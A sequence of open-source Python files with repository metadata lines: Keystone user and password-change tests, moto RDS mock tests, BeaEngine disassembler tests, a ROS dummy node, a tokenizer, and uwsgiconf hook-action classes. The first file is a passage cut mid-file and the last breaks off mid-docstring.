            id=user_id,
            name=user_id,
            tenantId=project_id,
            domain_id=CONF.identity.default_domain_id)

        # Expected result if the user is meant to have a tenantId element
        self.expected_user = {'id': user_id,
                              'name': user_id,
                              'username': user_id,
                              'tenantId': project_id}

        # Expected result if the user is not meant to have a tenantId element
        self.expected_user_no_tenant_id = {'id': user_id,
                                           'name': user_id,
                                           'username': user_id}

    def test_v3_to_v2_user_method(self):
        # v3_to_v2_user converts in place and returns the same object:
        # assertIs pins the identity, assertDictEqual the conversion.
        updated_user1 = controller.V2Controller.v3_to_v2_user(self.user1)
        self.assertIs(self.user1, updated_user1)
        self.assertDictEqual(self.expected_user, self.user1)
        updated_user2 = controller.V2Controller.v3_to_v2_user(self.user2)
        self.assertIs(self.user2, updated_user2)
        self.assertDictEqual(self.expected_user_no_tenant_id, self.user2)
        updated_user3 = controller.V2Controller.v3_to_v2_user(self.user3)
        self.assertIs(self.user3, updated_user3)
        self.assertDictEqual(self.expected_user, self.user3)
        updated_user4 = controller.V2Controller.v3_to_v2_user(self.user4)
        self.assertIs(self.user4, updated_user4)
        self.assertDictEqual(self.expected_user_no_tenant_id, self.user4)

    def test_v3_to_v2_user_method_list(self):
        # The converter also accepts a list and converts each element
        # in place, preserving order.
        user_list = [self.user1, self.user2, self.user3, self.user4]
        updated_list = controller.V2Controller.v3_to_v2_user(user_list)
        self.assertEqual(len(user_list), len(updated_list))
        for i, ref in enumerate(updated_list):
            # Order should not change.
            self.assertIs(ref, user_list[i])
        self.assertDictEqual(self.expected_user, self.user1)
        self.assertDictEqual(self.expected_user_no_tenant_id, self.user2)
        self.assertDictEqual(self.expected_user, self.user3)
        self.assertDictEqual(self.expected_user_no_tenant_id, self.user4)
class UserSelfServiceChangingPasswordsTestCase(test_v3.RestfulTestCase):
    """Exercise the self-service ``POST /users/{id}/password`` API."""

    def setUp(self):
        super(UserSelfServiceChangingPasswordsTestCase, self).setUp()
        self.user_ref = unit.create_user(self.identity_api,
                                         domain_id=self.domain['id'])
        # Token obtained with the user's initial password; individual
        # tests use it to authorize their change-password requests.
        self.token = self.get_request_token(self.user_ref['password'],
                                            http_client.CREATED)

    def get_request_token(self, password, expected_status):
        """Authenticate as self.user_ref and return the issued token id."""
        auth_data = self.build_authentication_request(
            user_id=self.user_ref['id'],
            password=password)
        r = self.v3_create_token(auth_data,
                                 expected_status=expected_status)
        return r.headers.get('X-Subject-Token')

    def change_password(self, expected_status, **kwargs):
        """Return a test response for a change password request."""
        return self.post('/users/%s/password' % self.user_ref['id'],
                         body={'user': kwargs},
                         token=self.token,
                         expected_status=expected_status)

    def test_changing_password(self):
        # original password works
        token_id = self.get_request_token(self.user_ref['password'],
                                          expected_status=http_client.CREATED)
        # original token works
        old_token_auth = self.build_authentication_request(token=token_id)
        self.v3_create_token(old_token_auth)
        # change password
        new_password = uuid.uuid4().hex
        self.change_password(password=new_password,
                             original_password=self.user_ref['password'],
                             expected_status=http_client.NO_CONTENT)
        # old password fails
        self.get_request_token(self.user_ref['password'],
                               expected_status=http_client.UNAUTHORIZED)
        # old token fails
        self.v3_create_token(old_token_auth,
                             expected_status=http_client.NOT_FOUND)
        # new password works
        self.get_request_token(new_password,
                               expected_status=http_client.CREATED)

    def test_changing_password_with_missing_original_password_fails(self):
        # original_password is mandatory in the request body.
        r = self.change_password(password=uuid.uuid4().hex,
                                 expected_status=http_client.BAD_REQUEST)
        self.assertThat(r.result['error']['message'],
                        matchers.Contains('original_password'))

    def test_changing_password_with_missing_password_fails(self):
        # The replacement password is mandatory as well.
        r = self.change_password(original_password=self.user_ref['password'],
                                 expected_status=http_client.BAD_REQUEST)
        self.assertThat(r.result['error']['message'],
                        matchers.Contains('password'))

    def test_changing_password_with_incorrect_password_fails(self):
        # A wrong original_password is rejected as unauthorized.
        self.change_password(password=uuid.uuid4().hex,
                             original_password=uuid.uuid4().hex,
                             expected_status=http_client.UNAUTHORIZED)

    def test_changing_password_with_disabled_user_fails(self):
        # disable the user account
        self.user_ref['enabled'] = False
        self.patch('/users/%s' % self.user_ref['id'],
                   body={'user': self.user_ref})
        self.change_password(password=uuid.uuid4().hex,
                             original_password=self.user_ref['password'],
                             expected_status=http_client.UNAUTHORIZED)

    def test_changing_password_not_logged(self):
        # When a user changes their password, the password isn't logged at any
        # level.
        log_fix = self.useFixture(fixtures.FakeLogger(level=log.DEBUG))
        # change password
        new_password = uuid.uuid4().hex
        self.change_password(password=new_password,
                             original_password=self.user_ref['password'],
                             expected_status=http_client.NO_CONTENT)
        self.assertNotIn(self.user_ref['password'], log_fix.output)
        self.assertNotIn(new_password, log_fix.output)
class PasswordValidationTestCase(UserSelfServiceChangingPasswordsTestCase):
    """Test password validation."""

    def setUp(self):
        super(PasswordValidationTestCase, self).setUp()
        # passwords require: 1 letter, 1 digit, 7 chars
        # NOTE: the pattern is a raw string so escapes like \d reach the
        # regex engine untouched; a plain literal triggers an
        # invalid-escape warning on newer Pythons (same runtime value).
        self.config_fixture.config(group='security_compliance',
                                   password_regex=(
                                       r'^(?=.*\d)(?=.*[a-zA-Z]).{7,}$'))

    def test_create_user_with_invalid_password(self):
        """POST /users with a too-weak password returns 400."""
        user = unit.new_user_ref(domain_id=self.domain_id)
        user['password'] = 'simple'
        self.post('/users', body={'user': user}, token=self.get_admin_token(),
                  expected_status=http_client.BAD_REQUEST)

    def test_update_user_with_invalid_password(self):
        """PATCH /users/{user_id} with a too-weak password returns 400."""
        user = unit.create_user(self.identity_api,
                                domain_id=self.domain['id'])
        user['password'] = 'simple'
        self.patch('/users/%(user_id)s' % {
            'user_id': user['id']},
            body={'user': user},
            expected_status=http_client.BAD_REQUEST)

    def test_changing_password_with_simple_password_strength(self):
        # password requires: any non-whitespace character
        self.config_fixture.config(group='security_compliance',
                                   password_regex=r'[\S]+')
        self.change_password(password='simple',
                             original_password=self.user_ref['password'],
                             expected_status=http_client.NO_CONTENT)

    def test_changing_password_with_strong_password_strength(self):
        self.change_password(password='mypassword2',
                             original_password=self.user_ref['password'],
                             expected_status=http_client.NO_CONTENT)

    def test_changing_password_with_strong_password_strength_fails(self):
        # no digit
        self.change_password(password='mypassword',
                             original_password=self.user_ref['password'],
                             expected_status=http_client.BAD_REQUEST)
        # no letter
        self.change_password(password='12345678',
                             original_password=self.user_ref['password'],
                             expected_status=http_client.BAD_REQUEST)
        # less than 7 chars
        self.change_password(password='mypas2',
                             original_password=self.user_ref['password'],
                             expected_status=http_client.BAD_REQUEST)
| cernops/keystone | keystone/tests/unit/test_v3_identity.py | Python | apache-2.0 | 37,174 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, unittest
test_records = frappe.get_test_records('Fiscal Year')
test_ignore = ["Company"]
class TestFiscalYear(unittest.TestCase):
    def test_extra_year(self):
        # Start from a clean slate in case the record already exists.
        year_name = "_Test Fiscal Year 2000"
        if frappe.db.exists("Fiscal Year", year_name):
            frappe.delete_doc("Fiscal Year", year_name)

        fiscal_year = frappe.get_doc({
            "doctype": "Fiscal Year",
            "year": year_name,
            "year_end_date": "2002-12-31",
            "year_start_date": "2000-04-01"
        })
        fiscal_year.insert()
        # The supplied end date is almost three years after the start;
        # after insert() the document reports it as one year minus a
        # day from the start date instead.
        self.assertEqual(fiscal_year.year_end_date, '2001-03-31')
| ESS-LLP/erpnext-medical | erpnext/accounts/doctype/fiscal_year/test_fiscal_year.py | Python | gpl-3.0 | 700 |
from kapteyn import maputils
import numpy
from service import *
# Figure 6 of the all-sky gallery: a stereographic (STG) projection.
# NOTE(review): plt, figsize, plotbox, dec0, markerpos and doplot all
# come from the `from service import *` star import above.
fignum = 6
fig = plt.figure(figsize=figsize)
frame = fig.add_axes(plotbox)
title = r"Stereographic projection (STG) diverges at $\theta=-90^\circ$. (Cal. fig.9)"
# Minimal FITS header: a 100x80 pixel RA/DEC grid in the STG
# projection with 12-degree pixel steps (CDELT1/2).
header = {'NAXIS' : 2, 'NAXIS1': 100, 'NAXIS2': 80,
          'CTYPE1' : 'RA---STG',
          'CRVAL1' :0.0, 'CRPIX1' : 50, 'CUNIT1' : 'deg', 'CDELT1' : -12.0,
          'CTYPE2' : 'DEC--STG',
          'CRVAL2' : dec0, 'CRPIX2' : 40, 'CUNIT2' : 'deg', 'CDELT2' : 12.0,
         }
# Graticule sampling: meridians every 30 deg, parallels every 10 deg.
X = numpy.arange(0,360.0,30.0)
Y = numpy.arange(-60,90,10.0)
f = maputils.FITSimage(externalheader=header)
annim = f.Annotatedimage(frame)
grat = annim.Graticule(axnum= (1,2),
                       wylim=(-60,90.0), wxlim=(0,360),
                       startx=X, starty=Y)
# Label placement tweaks passed through to doplot().
lat_constval = -62
lon_world = list(range(0,360,30))
lat_world = list(range(-50, 10, 10))
addangle0 = -90
labkwargs1 = {'color':'b', 'va':'bottom', 'ha':'right'}
doplot(frame, fignum, annim, grat, title,
       lon_world=lon_world, lat_world=lat_world, lat_constval=lat_constval,
       addangle0=addangle0, labkwargs1=labkwargs1, markerpos=markerpos)
| kapteyn-astro/kapteyn | doc/source/EXAMPLES/allskyf6.py | Python | bsd-3-clause | 1,138 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
# @author : beaengine@gmail.com
from headers.BeaEnginePython import *
from nose.tools import *
class TestSuite:
    """Decoder tests for EVEX opcode 0F38 A0 (VPSCATTERDD/VPSCATTERDQ).

    The original method repeated the same 12-line stanza six times;
    the cases are now table-driven through a private helper (the
    leading underscore keeps nose from collecting it as a test).
    """

    def _check(self, evex_spec, mnemonic, expected_repr):
        """Assemble opcode A0 with ModRM/SIB/disp bytes 44 33 22 under
        the given EVEX prefix and verify opcode, mnemonic and the full
        rendered disassembly."""
        myEVEX = EVEX(evex_spec)
        myEVEX.aaa = 1  # select opmask register k1
        Buffer = bytes.fromhex('{}a0443322'.format(myEVEX.prefix()))
        myDisasm = Disasm(Buffer)
        myDisasm.infos.Options = ShowEVEXMasking
        myDisasm.read()
        assert_equal(myDisasm.infos.Instruction.Opcode, 0xa0)
        assert_equal(myDisasm.infos.Instruction.Mnemonic, mnemonic)
        assert_equal(myDisasm.repr(), expected_repr)

    def test(self):
        # (EVEX spec, expected mnemonic, expected disassembly).
        cases = (
            # EVEX.128.66.0F38.W0 A0 /vsib : VPSCATTERDD vm32x {k1}, xmm1
            ('EVEX.128.66.0F38.W0', b'vpscatterdd',
             'vpscatterdd dword ptr [r11+xmm30+0088h] {k1}, xmm24'),
            # EVEX.256.66.0F38.W0 A0 /vsib : VPSCATTERDD vm32y {k1}, ymm1
            ('EVEX.256.66.0F38.W0', b'vpscatterdd',
             'vpscatterdd dword ptr [r11+ymm30+0088h] {k1}, ymm24'),
            # EVEX.512.66.0F38.W0 A0 /vsib : VPSCATTERDD vm32z {k1}, zmm1
            ('EVEX.512.66.0F38.W0', b'vpscatterdd',
             'vpscatterdd dword ptr [r11+zmm30+0088h] {k1}, zmm24'),
            # EVEX.128.66.0F38.W1 A0 /vsib : VPSCATTERDQ vm32x {k1}, xmm1
            ('EVEX.128.66.0F38.W1', b'vpscatterdq',
             'vpscatterdq dword ptr [r11+xmm30+0110h] {k1}, xmm24'),
            # EVEX.256.66.0F38.W1 A0 /vsib : VPSCATTERDQ vm32x {k1}, ymm1
            ('EVEX.256.66.0F38.W1', b'vpscatterdq',
             'vpscatterdq dword ptr [r11+xmm30+0110h] {k1}, ymm24'),
            # EVEX.512.66.0F38.W1 A0 /vsib : VPSCATTERDQ vm32y {k1}, zmm1
            ('EVEX.512.66.0F38.W1', b'vpscatterdq',
             'vpscatterdq dword ptr [r11+ymm30+0110h] {k1}, zmm24'),
        )
        for evex_spec, mnemonic, expected_repr in cases:
            self._check(evex_spec, mnemonic, expected_repr)
| 0vercl0k/rp | src/third_party/beaengine/tests/0f38a0.py | Python | mit | 4,160 |
from __future__ import unicode_literals
import boto3
import boto.rds
import boto.vpc
from boto.exception import BotoServerError
import sure # noqa
from moto import mock_ec2_deprecated, mock_rds_deprecated, mock_rds
from tests.helpers import disable_on_py3
@mock_rds_deprecated
def test_create_database():
    conn = boto.rds.connect_to_region("us-west-2")
    db = conn.create_dbinstance(
        "db-master-1", 10, "db.m1.small", "root", "hunter2", security_groups=["my_sg"]
    )
    # The mock reports the instance immediately available, with every
    # creation attribute echoed back.
    db.status.should.equal("available")
    db.id.should.equal("db-master-1")
    db.allocated_storage.should.equal(10)
    db.instance_class.should.equal("db.m1.small")
    db.master_username.should.equal("root")
    db.endpoint.should.equal(
        ("db-master-1.aaaaaaaaaa.us-west-2.rds.amazonaws.com", 3306)
    )
    db.security_groups[0].name.should.equal("my_sg")
@mock_rds_deprecated
def test_get_databases():
    conn = boto.rds.connect_to_region("us-west-2")
    # Starts empty, grows with each created instance.
    list(conn.get_all_dbinstances()).should.have.length_of(0)
    for name in ("db-master-1", "db-master-2"):
        conn.create_dbinstance(name, 10, "db.m1.small", "root", "hunter2")
    list(conn.get_all_dbinstances()).should.have.length_of(2)
    # Filtering by identifier returns just the single match.
    matches = conn.get_all_dbinstances("db-master-1")
    list(matches).should.have.length_of(1)
    matches[0].id.should.equal("db-master-1")
@mock_rds
def test_get_databases_paginated():
    conn = boto3.client("rds", region_name="us-west-2")
    # 51 instances: one more than the 50-item page served first.
    for i in range(51):
        conn.create_db_instance(
            AllocatedStorage=5,
            Port=5432,
            DBInstanceIdentifier="rds%d" % i,
            DBInstanceClass="db.t1.micro",
            Engine="postgres",
        )

    first_page = conn.describe_db_instances()
    first_page["DBInstances"].should.have.length_of(50)
    # The marker names the last instance of the page ...
    first_page["Marker"].should.equal(
        first_page["DBInstances"][-1]["DBInstanceIdentifier"])
    # ... and resuming from it yields the single remainder.
    second_page = conn.describe_db_instances(Marker=first_page["Marker"])
    second_page["DBInstances"].should.have.length_of(1)
@mock_rds_deprecated
def test_describe_non_existent_database():
    conn = boto.rds.connect_to_region("us-west-2")
    # Describing an unknown identifier raises rather than returning [].
    describe = conn.get_all_dbinstances
    describe.when.called_with("not-a-db").should.throw(BotoServerError)
@mock_rds_deprecated
def test_delete_database():
    conn = boto.rds.connect_to_region("us-west-2")

    def instance_count():
        return len(list(conn.get_all_dbinstances()))

    # Zero before creation, one after, zero again after deletion.
    instance_count().should.equal(0)
    conn.create_dbinstance("db-master-1", 10, "db.m1.small", "root", "hunter2")
    instance_count().should.equal(1)
    conn.delete_dbinstance("db-master-1")
    instance_count().should.equal(0)
@mock_rds_deprecated
def test_delete_non_existent_database():
    conn = boto.rds.connect_to_region("us-west-2")
    # Deleting an unknown identifier raises rather than no-opping.
    delete = conn.delete_dbinstance
    delete.when.called_with("not-a-db").should.throw(BotoServerError)
@mock_rds_deprecated
def test_create_database_security_group():
    conn = boto.rds.connect_to_region("us-west-2")
    sg = conn.create_dbsecurity_group("db_sg", "DB Security Group")
    # Name and description round-trip; no IP ranges authorized yet.
    sg.name.should.equal("db_sg")
    sg.description.should.equal("DB Security Group")
    list(sg.ip_ranges).should.equal([])
@mock_rds_deprecated
def test_get_security_groups():
    conn = boto.rds.connect_to_region("us-west-2")
    list(conn.get_all_dbsecurity_groups()).should.have.length_of(0)
    for name in ("db_sg1", "db_sg2"):
        conn.create_dbsecurity_group(name, "DB Security Group")
    list(conn.get_all_dbsecurity_groups()).should.have.length_of(2)
    # Filtering by name returns only the single match.
    matches = conn.get_all_dbsecurity_groups("db_sg1")
    list(matches).should.have.length_of(1)
    matches[0].name.should.equal("db_sg1")
@mock_rds_deprecated
def test_get_non_existent_security_group():
    conn = boto.rds.connect_to_region("us-west-2")
    # Looking up an unknown group name is an error, not an empty list.
    lookup = conn.get_all_dbsecurity_groups
    lookup.when.called_with("not-a-sg").should.throw(BotoServerError)
@mock_rds_deprecated
def test_delete_database_security_group():
    conn = boto.rds.connect_to_region("us-west-2")

    def group_count():
        return len(list(conn.get_all_dbsecurity_groups()))

    # One group after creation, none after deletion.
    conn.create_dbsecurity_group("db_sg", "DB Security Group")
    group_count().should.equal(1)
    conn.delete_dbsecurity_group("db_sg")
    group_count().should.equal(0)
@mock_rds_deprecated
def test_delete_non_existent_security_group():
    conn = boto.rds.connect_to_region("us-west-2")
    # Deleting an unknown group name raises a server error.
    delete = conn.delete_dbsecurity_group
    delete.when.called_with("not-a-db").should.throw(BotoServerError)
@disable_on_py3()
@mock_rds_deprecated
def test_security_group_authorize():
    conn = boto.rds.connect_to_region("us-west-2")
    sg = conn.create_dbsecurity_group("db_sg", "DB Security Group")
    list(sg.ip_ranges).should.equal([])
    # Authorize a single /32 and confirm it is persisted server-side.
    sg.authorize(cidr_ip="10.3.2.45/32")
    refreshed = conn.get_all_dbsecurity_groups()[0]
    list(refreshed.ip_ranges).should.have.length_of(1)
    refreshed.ip_ranges[0].cidr_ip.should.equal("10.3.2.45/32")
@mock_rds_deprecated
def test_add_security_group_to_database():
    conn = boto.rds.connect_to_region("us-west-2")
    db = conn.create_dbinstance(
        "db-master-1", 10, "db.m1.small", "root", "hunter2"
    )
    sg = conn.create_dbsecurity_group("db_sg", "DB Security Group")
    # Attach the group, then re-read the instance to see it applied.
    db.modify(security_groups=[sg])
    refreshed = conn.get_all_dbinstances()[0]
    list(refreshed.security_groups).should.have.length_of(1)
    refreshed.security_groups[0].name.should.equal("db_sg")
@mock_ec2_deprecated
@mock_rds_deprecated
def test_add_database_subnet_group():
    vpc_conn = boto.vpc.connect_to_region("us-west-2")
    vpc = vpc_conn.create_vpc("10.0.0.0/16")
    # Two subnets inside the VPC to populate the subnet group with.
    subnet_ids = [
        vpc_conn.create_subnet(vpc.id, cidr).id
        for cidr in ("10.0.1.0/24", "10.0.2.0/24")
    ]

    conn = boto.rds.connect_to_region("us-west-2")
    subnet_group = conn.create_db_subnet_group("db_subnet", "my db subnet", subnet_ids)
    subnet_group.name.should.equal("db_subnet")
    subnet_group.description.should.equal("my db subnet")
    list(subnet_group.subnet_ids).should.equal(subnet_ids)
@mock_ec2_deprecated
@mock_rds_deprecated
def test_describe_database_subnet_group():
    vpc_conn = boto.vpc.connect_to_region("us-west-2")
    vpc = vpc_conn.create_vpc("10.0.0.0/16")
    subnet = vpc_conn.create_subnet(vpc.id, "10.0.1.0/24")

    conn = boto.rds.connect_to_region("us-west-2")
    for group_name in ("db_subnet1", "db_subnet2"):
        conn.create_db_subnet_group(group_name, "my db subnet", [subnet.id])

    # Unfiltered listing sees both; filtering by name sees exactly one.
    list(conn.get_all_db_subnet_groups()).should.have.length_of(2)
    list(conn.get_all_db_subnet_groups("db_subnet1")).should.have.length_of(1)
    # An unknown name is an error rather than an empty list.
    conn.get_all_db_subnet_groups.when.called_with("not-a-subnet").should.throw(
        BotoServerError
    )
@mock_ec2_deprecated
@mock_rds_deprecated
def test_delete_database_subnet_group():
    vpc_conn = boto.vpc.connect_to_region("us-west-2")
    vpc = vpc_conn.create_vpc("10.0.0.0/16")
    subnet = vpc_conn.create_subnet(vpc.id, "10.0.1.0/24")

    conn = boto.rds.connect_to_region("us-west-2")
    conn.create_db_subnet_group("db_subnet1", "my db subnet", [subnet.id])
    list(conn.get_all_db_subnet_groups()).should.have.length_of(1)

    conn.delete_db_subnet_group("db_subnet1")
    list(conn.get_all_db_subnet_groups()).should.have.length_of(0)
    # Deleting it a second time is an error.
    conn.delete_db_subnet_group.when.called_with("db_subnet1").should.throw(
        BotoServerError
    )
@mock_ec2_deprecated
@mock_rds_deprecated
def test_create_database_in_subnet_group():
    vpc_conn = boto.vpc.connect_to_region("us-west-2")
    vpc = vpc_conn.create_vpc("10.0.0.0/16")
    subnet = vpc_conn.create_subnet(vpc.id, "10.0.1.0/24")

    conn = boto.rds.connect_to_region("us-west-2")
    conn.create_db_subnet_group("db_subnet1", "my db subnet", [subnet.id])
    conn.create_dbinstance(
        "db-master-1",
        10,
        "db.m1.small",
        "root",
        "hunter2",
        db_subnet_group_name="db_subnet1",
    )
    # Re-read the instance and confirm the subnet group stuck.
    db = conn.get_all_dbinstances("db-master-1")[0]
    db.subnet_group.name.should.equal("db_subnet1")
@mock_rds_deprecated
def test_create_database_replica():
    conn = boto.rds.connect_to_region("us-west-2")
    conn.create_dbinstance("db-master-1", 10, "db.m1.small", "root", "hunter2")

    replica = conn.create_dbinstance_read_replica(
        "replica", "db-master-1", "db.m1.small"
    )
    replica.id.should.equal("replica")
    replica.instance_class.should.equal("db.m1.small")
    # The replica advertises healthy read replication ...
    status_info = replica.status_infos[0]
    status_info.normal.should.equal(True)
    status_info.status_type.should.equal("read replication")
    status_info.status.should.equal("replicating")

    # ... and the primary lists it until it is deleted.
    primary = conn.get_all_dbinstances("db-master-1")[0]
    primary.read_replica_dbinstance_identifiers[0].should.equal("replica")

    conn.delete_dbinstance("replica")
    primary = conn.get_all_dbinstances("db-master-1")[0]
    list(primary.read_replica_dbinstance_identifiers).should.have.length_of(0)
@mock_rds_deprecated
def test_create_cross_region_database_replica():
    west_1_conn = boto.rds.connect_to_region("us-west-1")
    west_2_conn = boto.rds.connect_to_region("us-west-2")

    west_1_conn.create_dbinstance("db-master-1", 10, "db.m1.small",
                                  "root", "hunter2")
    # The primary lives in another region, so reference it by ARN.
    primary_arn = "arn:aws:rds:us-west-1:1234567890:db:db-master-1"
    west_2_conn.create_dbinstance_read_replica(
        "replica", primary_arn, "db.m1.small"
    )

    primary = west_1_conn.get_all_dbinstances("db-master-1")[0]
    primary.read_replica_dbinstance_identifiers[0].should.equal("replica")

    replica = west_2_conn.get_all_dbinstances("replica")[0]
    replica.instance_class.should.equal("db.m1.small")

    # Removing the replica clears it from the primary's replica list.
    west_2_conn.delete_dbinstance("replica")
    primary = west_1_conn.get_all_dbinstances("db-master-1")[0]
    list(primary.read_replica_dbinstance_identifiers).should.have.length_of(0)
@mock_rds_deprecated
def test_connecting_to_us_east_1():
    # boto does not use us-east-1 in the URL for RDS,
    # and that broke moto in the past:
    # https://github.com/boto/boto/blob/e271ff09364ea18d9d8b6f4d63d6b0ac6cbc9b75/boto/endpoints.json#L285
    conn = boto.rds.connect_to_region("us-east-1")
    db = conn.create_dbinstance(
        "db-master-1", 10, "db.m1.small", "root", "hunter2", security_groups=["my_sg"]
    )
    db.status.should.equal("available")
    db.id.should.equal("db-master-1")
    db.allocated_storage.should.equal(10)
    db.instance_class.should.equal("db.m1.small")
    db.master_username.should.equal("root")
    # The endpoint host must carry the us-east-1 region name.
    db.endpoint.should.equal(
        ("db-master-1.aaaaaaaaaa.us-east-1.rds.amazonaws.com", 3306)
    )
    db.security_groups[0].name.should.equal("my_sg")
@mock_rds_deprecated
def test_create_database_with_iops():
    conn = boto.rds.connect_to_region("us-west-2")
    db = conn.create_dbinstance(
        "db-master-1", 10, "db.m1.small", "root", "hunter2", iops=6000
    )
    db.status.should.equal("available")
    # Requesting provisioned IOPS is reflected in the instance ...
    db.iops.should.equal(6000)
    # ... and implies io1 storage.
    # boto>2.36.0 may change the following property name to `storage_type`
    db.StorageType.should.equal("io1")
| william-richard/moto | tests/test_rds/test_rds.py | Python | apache-2.0 | 11,441 |
#!/usr/bin/env python
from __future__ import print_function
import rospy
import time, threading
from std_msgs.msg import String
from ros_status_cli.srv import *
NODE_NAME="dummy_node"
class DummyNode(object):
    """Throwaway ROS node remote-controlled through its 'test_service'
    service: each DummyNodeAction request's ``action`` string selects a
    log call, publisher/service creation, or shutdown.
    """

    def periodic_publish(self):
        """Publish one message on test_topic, then re-arm a 10 ms timer.

        Stops re-arming once shutdown has been requested so no timer
        thread keeps publishing after the node goes down (the original
        re-armed unconditionally, forever).
        """
        if getattr(self, 'shutdown', False):
            return
        self.pub.publish("test")
        threading.Timer(0.01, self.periodic_publish).start()

    def do_nothing(self, req=None):
        """No-op handler for the extra dummy service.

        BUG FIX: rospy always passes the request to a service handler
        and expects a Response back; the original took no request
        argument (TypeError on every call) and returned None.  The
        request defaults to None so existing no-argument callers of
        this method keep working.
        """
        return DummyNodeActionResponse(True)

    def start_dummy_service(self):
        """Expose an extra no-op service under the node's namespace."""
        rospy.Service(NODE_NAME + '/dummy_service', DummyNodeAction,
                      self.do_nothing)

    def handle_dummy_node_action(self, req):
        """Dispatch one DummyNodeAction request by its action string.

        Returns a response whose payload is False for unknown actions.
        """
        # Each "log ..." action emits its own name at the matching level.
        log_actions = {
            "log debug": rospy.logdebug,
            "log info": rospy.loginfo,
            "log warn": rospy.logwarn,
            "log err": rospy.logerr,
            "log fatal": rospy.logfatal,
        }
        action = req.action
        result = True
        if action in log_actions:
            log_actions[action](action)
        elif action == "init publisher":
            self.pub = rospy.Publisher('test_topic', String, queue_size=10)
            self.periodic_publish()
        elif action == "init service":
            self.start_dummy_service()
        elif action == "shutdown":
            self.shutdown = True
        else:
            result = False
            print("unknown action")
        print("handle node action called")
        return DummyNodeActionResponse(result)

    def start(self):
        """Initialize the node and spin until a shutdown request arrives."""
        rospy.init_node(NODE_NAME, log_level=rospy.DEBUG, anonymous=False)
        rospy.Service('test_service', DummyNodeAction,
                      self.handle_dummy_node_action)
        rate = rospy.Rate(10)
        self.shutdown = False
        while not self.shutdown:
            rate.sleep()
        print("shutting down")
        rospy.signal_shutdown("requested")
if __name__ == '__main__':
    # Run the dummy node until a "shutdown" action is received via the service.
    node = DummyNode()
    node.start()
| team-diana/ros_status_cli | test/rostest/dummy_node.py | Python | mit | 1,898 |
#-*- coding: UTF-8
import re
# Delimiters we split on: common punctuation plus any whitespace.  The
# capturing group makes re.split() keep the delimiters, so they come back
# as tokens too.  The original used a ``ur''`` raw-unicode literal, which
# is Python-2-only (a SyntaxError on Python 3); a plain raw string keeps
# the exact same pattern and works on both.
splitter = re.compile(
    r'([,\.!\?:;\s\n\t])'
    , re.UNICODE)


def tokenize(string):
    '''Split string to words.

    Returns the non-whitespace pieces (words and punctuation marks),
    each stripped; empty/whitespace-only pieces are dropped.
    '''
    # Strip each piece once instead of twice (the original stripped in
    # both the condition and the result expression).
    stripped = (item.strip() for item in splitter.split(string))
    return [item for item in stripped if item]
if __name__ == '__main__':
    import unittest

    class TokenizerTest(unittest.TestCase):
        def testIt(self):
            # Clean tokens round-trip unchanged; appending '!' to every
            # token doubles the count (each word plus its punctuation mark
            # comes back as a separate token).
            tokens = [ u'хуй', u'пизда', u'анархия' ]
            dirty_tokens = [ token + u'!' for token in tokens ]
            assert(tokenize(' '.join(tokens)) == tokens)
            assert(len(tokenize(' '.join(dirty_tokens))) == len(tokens) * 2)

    unittest.main()
| trunk/littlebrother | littlebrother/ident/utils.py | Python | mit | 594 |
from pathlib import Path
from typing import Union
from ..base import ParametrizedValue
from ..utils import listify
class HookAction(ParametrizedValue):
    """Base class for uWSGI hook actions; concrete actions set ``name``
    and pass their arguments through ``__init__``."""
    pass
class ActionMount(HookAction):
    """Mount or unmount filesystems.

    Examples:
        * Mount: proc none /proc
        * Unmount: /proc
    """
    name = 'mount'

    def __init__(self, mountpoint, *, fs=None, src=None, flags=None):
        """
        :param str mountpoint:
        :param str fs: Filesystem. Presence indicates mounting.
        :param str src: Presence indicates mounting.
        :param str|list flags: Flags available for the operating system.
            As an example on Linux you will options like: bind, recursive, readonly, rec, detach etc.
        """
        if flags is not None:
            flags = listify(flags)
            flags = ','.join(flags)
        # NOTE(review): mount vs. umount is decided by ``fs`` alone, even
        # though the docstring says ``src`` also indicates mounting —
        # confirm intended behavior when only ``src`` is given.
        if fs:
            args = [fs, src, mountpoint, flags]
        else:
            args = [mountpoint, flags]
            # No filesystem given: treat as an unmount request.
            self.name = 'umount'
        super().__init__(*args)
class ActionExecute(HookAction):
    """Run a shell command.

    The command is executed under ``/bin/sh``; if that is undesirable
    for some reason, see the ``binsh`` option.

    Example:
        * cat /proc/self/mounts
    """

    name = 'exec'

    # todo consider adding safeexec
    def __init__(self, command):
        """
        :param str command: Shell command line to execute.
        """
        super().__init__(command)
class ActionCall(HookAction):
    """Invoke functions in the current process address space."""

    name = 'call'

    def __init__(self, target, *, honour_exit_status=False, arg_int=False):
        """
        :param str target: Symbol (and arguments) to call.
        :param bool honour_exit_status: Expect an int return;
            anything != 0 means failure.
        :param bool arg_int: Parse the argument as an int.
        """
        # Hook variants are selected by suffixing the base name:
        # call / callint / callret / callintret.
        suffix = ('int' if arg_int else '') + ('ret' if honour_exit_status else '')
        self.name = self.name + suffix
        super().__init__(target)
class ActionDirChange(HookAction):
    """Change the current working directory.

    Convenience action, equivalent to ``call:chdir <directory>``.
    """

    name = 'cd'

    def __init__(self, target_dir):
        """
        :param str target_dir: Directory to switch into.
        """
        super().__init__(target_dir)
class ActionDirCreate(HookAction):
    """Create a directory with mode 0777."""

    name = 'mkdir'

    def __init__(self, target_dir):
        """
        :param str target_dir: Path of the directory to create.
        """
        super().__init__(target_dir)
class ActionFileCreate(HookAction):
    """Creates a file with 0666.

    (The original docstring said "directory" — an apparent copy-paste
    from ``ActionFileCreate``'s sibling ``ActionDirCreate``; the
    ``create`` hook takes a file path.)
    """
    name = 'create'

    def __init__(self, fpath: Union[str, Path]):
        super().__init__(fpath)
class ActionExit(HookAction):
    """Exit the process.

    Convenience action, equivalent to ``callint:exit [num]``.
    """

    name = 'exit'

    def __init__(self, status_code=None):
        """
        :param int status_code: Optional exit status code.
        """
        super().__init__(status_code)
class ActionPrintout(HookAction):
    """Print a message to the log.

    Convenience action, equivalent to calling the ``uwsgi_log`` symbol.
